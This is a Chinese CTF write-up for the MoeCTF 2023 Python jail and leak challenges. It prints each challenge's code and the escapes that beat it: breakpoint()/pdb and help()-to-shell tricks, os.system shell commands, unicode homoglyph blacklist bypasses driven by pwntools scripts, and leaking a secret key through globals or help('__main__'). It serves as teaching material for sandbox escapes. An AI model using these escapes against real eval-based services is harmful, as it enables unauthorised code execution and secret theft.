【西电Moectf2023-Jail-WP】

已于 2023-09-28 09:08:56 修改
阅读量2.6k 收藏 10
点赞数 5
分类专栏: CTF python3 PyJail 文章标签: python 算法
于 2023-09-27 16:21:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33295410/article/details/133355192
版权
CTF 同时被 3 个专栏收录
7 篇文章 0 订阅
订阅专栏
python3
2 篇文章 0 订阅
订阅专栏
PyJail
1 篇文章 0 订阅
订阅专栏

Jail Level 0

小C给MoeCTF制作了一个Jail类别的挑战,不过考虑到很多同学对于Jail这类题目并不是很熟悉的前提下.小C采取了一种很友好的交互方式告诉各位如何进行相关的操作

当各位玩家连接后 可以看到一个类似于菜单的东西.输入g(G)会获得挑战的源码,输入e(E)会进入挑战,输入c(C)会得到挑战的描述[题目里的会更加详细],输入q(Q)会退出

小tips:如果你不熟悉python,不妨可以先看看 3.11.5 DocumentationPython3 教程 | 菜鸟教程

祝大家能够玩得开心,成功逃离小C的pyjail!

这里是level0,十分简单,我相信你能很快解决他。

获取题目源码:

根据Bypass Python sandboxes提示,直接找到eval getshell代码即可

Jail Level 1

题目代码:

print("Welcome to the MoeCTF2023 Jail challenge level1.It's time to work on this calc challenge.")

print("Enter your expression and I will evaluate it for you.")

user_input_data = input("> ")

if len(user_input_data)>12: 

    print("Oh hacker! Bye~") 

    exit(0)

 print('calc Answer: {}'.format(eval(user_input_data)))

关键的在于len(user_input_data)>12 限制了长度为12。

查询资料发现breakpoint 函数可以执行命令。

pdb 模块定义了一个交互式源代码调试器,用于 Python 程序。它支持在源码行间设置(有条件的)断点和单步执行,检视堆栈帧,列出源码列表,以及在任何堆栈帧的上下文中运行任意 Python 代码。它还支持事后调试,可以在程序控制下调用。

在输入 breakpoint() 后可以代开 Pdb 代码调试器,在其中就可以执行任意 python 代码

breakpoint()

__import__('os').system('ls')

Jail Level 2

DESCRIPTION: 这里是level2 你能用比level1更短的payload解决这个挑战吗

print("Welcome to the MoeCTF2023 Jail challenge level1.It's time to work on this calc challenge.")

print("Enter your expression and I will evaluate it for you.")

user_input_data = input("> ")

if len(user_input_data)>6: 

    print("Oh hacker! Bye~") 

    exit(0)

 print('calc Answer: {}'.format(eval(user_input_data)))

关键的在于len(user_input_data)>6限制了长度为6。

help 函数

help 函数可以打开帮助文档. 索引到 os 模块之后可以打开 sh

当我们输入 help 时,注意要进行 unicode 编码,help 函数会打开帮助

𝘩𝘦𝘭𝘱()

然后输入 os,此时会进入 os 的帮助文档。

help> os

然后在输入 !sh 就可以拿到 /bin/sh, 输入 !bash 则可以拿到 /bin/bash

help> os $ ls a-z0-9.py  exp2.py  exp.py  flag.txt $

Jail Level 3

DESCRIPTION: 这里是level3 和level1有关 但是之前的payload不能直接工作

  import re   

    BANLIST = ['breakpoint']   

    BANLIST_WORDS = '|'.join(f'({WORD})' for WORD in BANLIST)   

    print("Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.")   

    print("Enter your expression and I will evaluate it for you.")   

    user_input_data = input("> ")   

    if len(user_input_data)>12:     

        print("Oh hacker! Bye~")     

        exit(0)   

    if re.findall(BANLIST_WORDS, user_input_data, re.I):     

        raise Exception('Blacklisted word detected! you are hacker!')   

    print('Answer result: {}'.format(eval(user_input_data)))

经过测试发现使用unicode编码可以绕过breakpoint()黑名单,例如:breakpºint()

手动在终端输入是不行的,需要使用脚本提交,贴上代码

from pwn import *

def start(ss):

    p = remote('localhost',52238)

    msg = p.recv()

    # print(msg)

    p.sendline(b'e')

    print(p.recv())

    p.sendline(ss)

    p.interactive()

s='breakpoint()'

#需要绕过的字符串



for i in range(128,65537):

    tmp=chr(i)

    try:

        res = tmp.encode('idna').decode('utf-8')

        if("--") in res:

            continue

        # print("U:{}    A:{}      ascii:{} ".format(tmp, res, i))

        if res in s and len(res)>0:

            print("U:{}    A:{}      ascii:{} ".format(tmp, res, i))

            start(s.replace(res,tmp))

            # break

    except:

        pass

Jail Level 4

CHALLENGE: Jail Level 4

DESCRIPTION: 这里是level4 他似乎就是一个简单的复读机 我们该如何逃逸他呢 ?_?

无任何过滤,直接输入payload

__import__('os').system('ls')

__import__('os').system('cat flag')

后获取 到源代码:

print WELCOMEprint "Welcome to the MoeCTF2023 Jail challenge.This is a repeater and it repeats what you say!"

print "python verison:2.7"

while True:  user_input_data = input("> ") 

    print user_input_data

Leak Level 0

CHALLENGE: Leak Level 0

DESCRIPTION: 欢迎来到m0eLeak 你需要用你的所学来泄露一些特殊的东西 从而进行rce或者其他的操作 这里是level0 非常简单

题目代码:

fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"

print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")

print("""| Options:

|       [V]uln

|       [B]ackdoor""")

def func_filter(s):

  not_allowed = set('vvvveeee')

  return any(c in not_allowed for c in s)

while(1):

  challenge_choice = input(">>> ").lower().strip()

  if challenge_choice == 'v':

    code = input("code >> ")

    if(len(code)>9):

      print("you're hacker!")

      exit(0)

    if func_filter(code):

      print("Oh hacker! byte~")

      exit(0)

    print(eval(code))

  elif challenge_choice == 'b':

    print("Please enter the admin key")

    key = input("key >> ")

    if(key == fake_key_into_local_but_valid_key_into_remote):

      print("Hey Admin,please input your code:")

      code = input("backdoor >> ")

      print(eval(code))

  else:

    print("You should select valid choice!")

设置了两个功能,一个是漏洞利用,可以使用python下面函数查看环境变量,找到真正的key,再利用backdoor来getshell。

global ()和locals ()函数

使用global ()可以获取Python中的全局变量;

使用locals ()可以获取Python中的局部变量;

Leak Level 1

CHALLENGE: Leak Level 1

DESCRIPTION: 这里是level1 比level0多了一些过滤

题目代码:

fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"

print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")

def func_filter(s):

  not_allowed = set('moe_dbt')

  return any(c in not_allowed for c in s)

print("""| Options:

|       [V]uln

|       [B]ackdoor""")

while(1):

  challenge_choice = input(">>> ").lower().strip()

  if challenge_choice == 'v':

    code = input("code >> ")

    if(len(code)>6):

      print("you're hacker!")

      exit(0)

    if func_filter(code):

      print("Oh hacker! byte~")

      exit(0)

    print(eval(code))

  elif challenge_choice == 'b':

    print("Please enter the admin key")

    key = input("key >> ")

    if(key == fake_key_into_local_but_vailed_key_into_remote):

      print("Hey Admin,please input your code:")

      code = input("backdoor >> ")

      print(eval(code))

  else:

    print("You should select valid choice!")

在上一题基础上增加了长度为6的限制,另外过滤moe_dbt,不过此处可以用unicode绕过。

HNCTF题解
我们的payload长度被限制到了6,我们看来又只能用help()函数了。但是我们在操作的时候,发现!sh不能进到shell里面。向Crazyman确认了一下,他说这道题的socat做了手脚,因此无法用前面的方法来RCE。

不过我们至少方向是对的,第一步肯定是进到help()中。然后,我看了下help的第一句话:

Enter the name of any module, keyword, or topic to get help on writing Python programs and using Python modules. To quit this help utility and return to the interpreter, just type "quit".To get a list of available modules, keywords, symbols, or topics, type "modules", "keywords", "symbols", or "topics". Each module also comes with a one-line summary of what it does; to list the modules whose name or summary contain a given string such as "spam", type "modules spam".

所以重点在Enter the name of any module, keyword, or topic上。我们之前输入os得到os模块的帮助,那么我们如果输入__main__的话,是不是得到当前模块的帮助?答案是肯定的:我们输入__main__之后,就返回了当前模块的信息,包括全局变量:

我的exp


from pwn import *


def start(ss):

    p = remote('localhost',58290)

    msg = p.recv()

    # print(msg)

    p.sendline(b'e')

    print(p.recv())

    p.sendline(b'v')

    print(p.recv())

    p.sendline(ss)

    # p.sendline(b'v')

    print(p.recv())

    # print(p.recv())

    # p.sendline(b"__import__('os').system('cat flag')")

    p.interactive()


#需要绕过的字符串

payload='help()'

blacklist='e'



for i in range(128,65537):

    tmp=chr(i)

    try:

        res = tmp.encode('idna').decode('utf-8')

        if("--") in res:

            continue

        # print("U:{}    A:{}      ascii:{} ".format(tmp, res, i))

        if res in blacklist:

            print("U:{}    A:{}      ascii:{} ".format(tmp, res, i))

            start(payload.replace(res,tmp))

            # break

    except:

        pass

得到help后输入__main__获取key成功,随后切换到backdoor getshell即可

交互式的shell

__import__('os').system('sh')

Leak Level 2

CHALLENGE: Leak Level 2

DESCRIPTION: 这里是level2 比level1多了一些过滤

题目代码:

fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"

print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")

print("""| Options:

|       [V]uln

|       [B]ackdoor""")

def func_filter(s):

  not_allowed = set('dbtaaaaaaaaa!')

  return any(c in not_allowed for c in s)

while(1):

  challenge_choice = input(">>> ").lower().strip()

  if challenge_choice == 'v':

    print("you need to ")

    code = input("code >> ")

    if(len(code)>6):

      print("you're hacker!")

      exit(0)

    if func_filter(code):

      print("Oh hacker! byte~")

      exit(0)

    if not code.isascii():

      print("please use ascii only thanks!")

      exit(0)

    print(eval(code))

  elif challenge_choice == 'b':

    print("Please enter the admin key")

    key = input("key >> ")

    if(key == fake_key_into_local_but_vailed_key_into_remote):

      print("Hey Admin,please input your code:")

      code = input("backdoor> ")

      print(eval(code))

  else:

    print("You should select valid choice!")

和上一题的区别在于增加了下面一行,不允许使用unicode编码绕过了,但是貌似没有过滤help(),可以直接使用help(),然后__main__查看全局变量。

if not code.isascii():

      print("please use ascii only thanks!")

      exit(0)

M1r4n
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
newifi-d2-jail-break.ko
04-03
某品牌路由器刷机不死启动必备工具,懒得四处找了,自已备用,newifi d2,简单3步: 1,打开SSH,... 2,下载newifi-d2-jail-break.ko到/tmp 3,insmod newifi-d2-jail-break.ko
ansible-role-ssh-chroot-jail:Ansible角色-SSH chroot监狱配置
01-31
1. **安装角色**:首先,你需要将 `ansible-role-ssh-chroot-jail` 角色添加到你的 Ansible Galaxy 或者从 GitHub 下载到本地的 `roles` 目录下。 2. **配置变量**:在你的 playbook 中,定义角色所需的变量,如用户...
moeCTF题解-0x06】Web
框架科工:Framecraft
11-06 2510
title: 【moeCTF题解-0x06】Web categories: CTF moeCTF tags: CTF Web PythonmoeCTF题解-0x06】Web 竟然AK了这部分,但也只是因为题目简单…… 考虑到在XDSEC里选了web方向,也要好好学习web知识呀 【moeCTF题解】总目录如下:(若本文图片看不见请访问以下相应的地址) 【moeCTF题解-0x00】序 (包括Sign in) 【moeCTF题解-0x01】Reverse (包括An.
pyjail初了解
Aiwin的博客
05-30 2088
pyjail初了解
moeCTF题解-0x00】序
框架科工:Framecraft
10-09 775
moeCTF题解-0x00】序 本是空间院的摸鱼佬,毫无准备地转到了网安专业。虽然实验班的机试让我初窥了CTF的世界,但moeCTF才是真正的入门之旅,感谢大佬师傅们的教程式渐进题目,让我学到了好多好多。啊,现在我已经不是萌新惹。作为大二的老生参与moe,还是挺羞耻呢 (〃ノωノ) 感觉自己目前对Misc部分最擅长,这部分也最有趣啦,(可能因为以前也都是野路子叭,只自己捣鼓电脑,学得杂而不精),其他方向感觉仍在门外需慢慢学习…… 这些题解会同时发布于我的GitHub小窝 ...
2023MoeCTF-WEB题解(持续更新)
m0_74317362的博客
10-18 921
先进行一次16进制解码再对后面的字符串进行一次base64解码,得到flag。
[MoeCTF]2023
liaochonxiang的博客
10-16 214
junk_code RUST 根据提示下载完插件后,在IDAZ中运行以下代码生成插件 ezandroid 来到主函数,发现调用sub_270CDF函数 来到主要逻辑处sub_27BF90函数 跟进加密函数 EXP
get-out-of-jail-free:为您的红队一键式法律文书工作
06-22
因此,“get-out-of-jail-free”理念应运而生,它旨在为红队行动提供一种法律保障机制,即预先准备好的法律文书,确保在执行任务时能够合法、合规地进行。 “get-out-of-jail-free”并非游戏中的“出狱免费卡”,...
matlab学生管理系统代码-vpl-jail-system:VPL-VirtualProgrammingLab是Moodle管理编程作业的活
06-01
matlab学生管理系统代码vpl-jail-system(虚拟编程实验室) VPL-Virtual Programming Lab 是 Moodle 的活动模块,用于管理编程作业,其显着特点是: -> 允许在浏览器中编辑程序源代码 -> 学生可以在浏览器中以交互...
Among-Us-Jail-Mod
03-07
"Jail Mod"是这款游戏的一个模组,为原本的游戏体验增添了新的元素和挑战。在这个模组中,游戏规则和机制可能有所变化,比如增加了监狱(Jail)的概念,为玩家之间的互动和策略制定提供了新的可能性。 在《Among Us...
【2022Paradigm.ctf】random writeup
Rorschach:Blog
08-22 953
区块链智能合约相关题目
Writeup-moectf-ezphp
DoubleLiii的博客
10-27 958
moectf web方向一个题
Python Jail 沙盒逃逸 合集
Jay17的博客
08-22 3251
Python Jail 沙盒逃逸 合集
NSS [MoeCTF 2022]ezhtml
Jay17的博客
07-09 231
NSS [MoeCTF 2022]ezhtml
MoeCTF 2023 Web+Jail wp
Jay17的博客
10-18 1663
MoeCTF 2023 Web+Jail wp
MoeCTF 2023 “天网“ 题解
最新发布
qq_34090939的博客
12-19 1207
十分的创新,对新生来说也是一道很有意义的题,在做这道题的过程中也可以学到非常多的编程概念,例如异常处理、面向对象、委托事件等等,同时还能感受到C#的魅力~ 看似毫无关联的东西,但最后串联起来的感觉十分过瘾~~个人愿意打满分的一道.NET逆向题~希望可可能再多来点这种题QwQ。
bugku crypto-python_jail
weixin_46578840的博客
08-22 596
启动场景后得到nc ip+端口号 连上之后发现print flag会报错 而且经过测试只能传入10个字符多了就会报错 那就不能用print 利用python中help()函数,借报错信息带出flag变量值内容, 刚好10个字符
NSSCTF-[NSSRound#X Basic]ez_z3 && [MoeCTF 2022]Art &&[HDCTF2023]basketball
weixin_61154173的博客
04-27 1308
RGB的初见,DFS代码求多解
MoeCTF2022 部分Crypto 复现
Luiino的博客
11-05 2904
用基础方法解不出来,原因是e与phi_n不互素,又phi_n = (p-1)*(q-1),求gcd(e,(p-1))和gcd(e,(q-1)),发现e与p-1互素。choice用法:从非空序列中随机选取一个数据并带回,该序列可以是list、tuple、str、set。,计算delt + N是否为完全平方数,如果为完全平方数,那么delt + N =Wilson定理:如果p是素数,则(p − 1)!可以知道p、q相近,则|p-q|很小,进而。因此,我们可以爆破差值delt,即。与 N 相差很小,从而。
python jail
08-18
Python jail是指一个限制Python代码执行的环境,目的是为了防止恶意代码的执行。在Python jail中,使用了一些限制措施来阻止恶意代码的执行,比如通过白名单的形式限制了能使用的东西,并限制了输入数据的长度。在一个示例中,Python jail打印了一个欢迎信息,然后接受用户输入的表达式,并对其进行求值,但是限制了输入数据的长度不能超过7个字符。如果输入数据超过了限制的长度,程序会提示"Hacker!"并退出。否则,程序会对输入的表达式进行求值并输出结果。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ioc:用于 BSD 监狱管理的 libioc 命令行工具](https://download.csdn.net/download/weixin_42151599/19192934)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [pyjail初了解](https://blog.csdn.net/weixin_53090346/article/details/130939099)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M1r4n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值